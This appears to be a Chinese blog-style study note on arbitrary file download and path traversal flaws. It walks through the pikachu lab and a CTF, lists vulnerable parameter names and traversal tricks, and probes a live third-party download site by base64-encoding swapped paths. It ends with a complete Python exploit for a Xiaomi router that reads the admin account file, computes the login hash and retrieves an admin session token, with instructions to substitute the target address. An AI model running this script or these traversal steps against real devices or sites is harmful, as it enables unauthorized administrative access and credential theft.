通过文件下载,可以下载到目标网站的数据库配置文件或网站信息文件,对后续的渗透有很大帮助!
文件下载
靶场环境pikachu
右键点击图片链接查看
http://172.21.22.23:88/vul/unsafedownload/execdownload.php?filename=kb.png
http://172.21.22.23:88/vul/unsafedownload/execdownload.php?filename=ai.png
把filename的值改为上一层的php文件
http://172.21.22.23:88/vul/unsafedownload/execdownload.php?filename=…/execdownload.php
访问即可下载
同样可以在下载的文件中查找敏感文件信息进行下载
如何知道网站目录的信息结构:
通过扫描工具如御剑扫描,burpsuit,
只要字典足够好,什么都能扫得到!
判断
根据参数值
- read.xxx?filename=
- down.xxx?filename=
- readfile.xxx?file=
- downfile.xxx?file=
- …/ …\ .\ ./等
- %00 ? %23 %20 .等
- &readpath=、&filepath=、&path=、&inputfile=、&url=、&data=、&readfile=、
- &menu=、META-INF= 、WEB-INF
测试网站
只是练习,不搞破坏!
https://www.znds.com/
鼠标右键复制链接查看
http://down.znds.com/getdownurl/?s=L2Rvd24vMjAyMTA1MzEvdHhzcDE2MTU4XzcuNC4wLjEwMTBfZGFuZ2JlaS5hcGs=
base64解密后为
http://down.znds.com/getdownurl/s=/down/20210531/txsp16158_7.4.0.1010_dangbei.apk
如果把s后面的文件换成网络的php文件就能下载
下载时要把s后面的参数值进行base64加密
CTF考题
点击Help复制链接
filename=help.docx
很像文件下载
javaweb开放一般文件下载都以post方式进行提交
通过抓取数据包得知是javaweb开放
由于javaweb有WEB-INF/web.xml的配置问件
成功下载,打开获取flag!
漏洞文件下载
百度杯
挺难的!
https://www.ichunqiu.com/battalion?t=1&r=57475
登录密码抓包
把login修改为1
通过点击manage发送把login改为1获取数据包
module为网站模型框架
这个module涉及到文件下载漏洞,这里先留着,我不会,等以后解决!
小米路由器任意文件下载
https://www.seebug.org/vuldb/ssvid-98122
http://192.168.31.1/api-third-party/download/extdisks…/etc/shadow
直接在网站根目录下输入/api-third-party/download/extdisks…/etc/shadow
如果能获取文件就证明有漏洞
用python3执行
把里面的网址换成目标网址加端口
import os
import re
import time
import base64
import random
import hashlib
import requests
from Crypto.Cipher import AES
# proxies = {"http":"http://127.0.0.1:8080"}
proxies = {}
def get_mac():
## get mac
r0 = requests.get("http://192.168.31.1/cgi-bin/luci/web", proxies=proxies)
mac = re.findall(r'deviceId = \'(.*?)\'', r0.text)[0]
# print(mac)
return mac
def get_account_str():
## read /etc/config/account
r1 = requests.get("http://192.168.31.1/api-third-party/download/extdisks../etc/config/account", proxies=proxies)
print(r1.text)
account_str = re.findall(r'admin\'? \'(.*)\'', r1.text)[0]
return account_str
def create_nonce(mac):
type_ = 0
deviceId = mac
time_ = int(time.time())
rand = random.randint(0,10000)
return "%d_%s_%d_%d"%(type_, deviceId, time_, rand)
def calc_password(nonce, account_str):
m = hashlib.sha1()
m.update((nonce + account_str).encode('utf-8'))
return m.hexdigest()
mac = get_mac()
account_str = get_account_str()
## login, get stok
nonce = create_nonce(mac)
password = calc_password(nonce, account_str)
data = "username=admin&password={password}&logtype=2&nonce={nonce}".format(password=password,nonce=nonce)
r2 = requests.post("http://192.168.31.1/cgi-bin/luci/api/xqsystem/login",
data = data,
headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"},
proxies=proxies)
# print(r2.text)
stok = re.findall(r'"token":"(.*?)"',r2.text)[0]
print("stok="+stok)
获取stok值
把stok值加;号拼到网址后面成功进入